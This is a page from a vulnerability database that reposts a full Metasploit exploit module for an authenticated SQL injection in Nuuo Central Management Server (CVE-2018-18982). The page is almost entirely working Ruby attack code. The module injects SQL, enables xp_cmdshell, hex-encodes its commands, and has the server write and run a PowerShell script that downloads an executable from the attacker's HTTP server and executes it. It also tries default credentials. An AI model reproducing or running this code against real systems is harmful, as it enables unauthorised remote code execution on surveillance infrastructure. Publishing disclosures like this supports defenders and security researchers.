Nuuo Central Management SQL Injection

2019.02.22
Credit: Pedro Ribeiro
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Exploit::Remote::Nuuo include Msf::Exploit::Remote::HttpServer def initialize(info={}) super(update_info(info, 'Name' => 'Nuuo Central Management Authenticated SQL Server SQLi', 'Description' => %q{ The Nuuo Central Management Server allows an authenticated user to query the state of the alarms. This functionality can be abused to inject SQL into the query. As SQL Server 2005 Express is installed by default, xp_cmdshell can be enabled and abused to achieve code execution. This module will either use a provided session number (which can be guessed with an auxiliary module) or attempt to login using a provided username and password - it will also try the default credentials if nothing is provided. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module ], 'References' => [ [ 'CVE', '2018-18982' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ], [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ] ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'Stance' => Msf::Exploit::Stance::Aggressive, # we need this to run in the foreground 'Targets' => [ [ 'Nuuo Central Management Server <= v2.10.0', {} ], ], 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK ] }, 'Privileged' => false, # we run as NETWORK_SERVICE 'DisclosureDate' => 'Oct 11 2018', 'DefaultTarget' => 0)) register_options [ Opt::RPORT(5180), OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]), OptString.new('URIPATH', [true, 'The URI to use for this exploit', "/#{rand_text_alpha(8..10)}"]) ] end def inject_sql(sql, final = false) sql = ['GETOPENALARM',"DeviceID: #{rand_text_numeric(4)}","SourceServer: ';#{sql};-- ","LastOne: #{rand_text_numeric(4)}"] if final nucs_send_msg_async(sql) else nucs_send_msg(sql) end end # Handle incoming requests from the server def on_request_uri(cli, request) unless @pl print_error("A request came in, but the payload wasn't ready yet!") return end print_good('Sending the payload to CMS...') send_response(cli, @pl) Rex.sleep(3) print_status('Executing shell...') inject_sql(create_hex_cmd("xp_cmdshell \"cmd /c C:\\windows\\temp\\#{@filename}\""), true) register_file_for_cleanup("c:/windows/temp/#{@filename}") end def create_hex_cmd(cmd) var = rand_text_alpha(2) hex_cmd = "declare @#{var} varchar(8000); select @#{var}=0x" cmd.each_byte { |b| hex_cmd << b.to_i.to_s(16) } hex_cmd << "; exec (@#{var})" end def primer # we need to roll our own here instead of using the MSSQL mixins # (tried that and it doesn't work) service_url = "http://#{srvhost_addr}:#{srvport}#{datastore['URIPATH']}" print_status("Enabling xp_cmdshell and asking CMS to download and execute #{service_url}") @filename = "#{rand_text_alpha_lower(8..10)}.exe" ps1 = "#{rand_text_alpha_lower(8..10)}.ps1" download_pl = %{xp_cmdshell } download_pl << %{'cd C:\\windows\\temp\\ && } download_pl << %{echo $webclient = New-Object System.Net.WebClient >> #{ps1} && } download_pl << %{echo $url = "#{service_url}" >> #{ps1} && } download_pl << %{echo $file = "#{@filename}" >> #{ps1} && } download_pl << %{echo $webclient.DownloadFile($url,$file) >> #{ps1} && } download_pl << %{powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File #{ps1}'} print_status('Injecting PowerShell payload') inject_sql("exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; " + create_hex_cmd(download_pl)) register_file_for_cleanup("c:/windows/temp/#{ps1}") end def exploit nucs_login unless @nucs_session fail_with(Failure::Unknown, 'Failed to login to Nuuo CMS') end @pl = generate_payload_exe #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end begin Timeout.timeout(datastore['HTTPDELAY']) {super} rescue Timeout::Error datastore['SSL'] = true if ssl_restore end end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top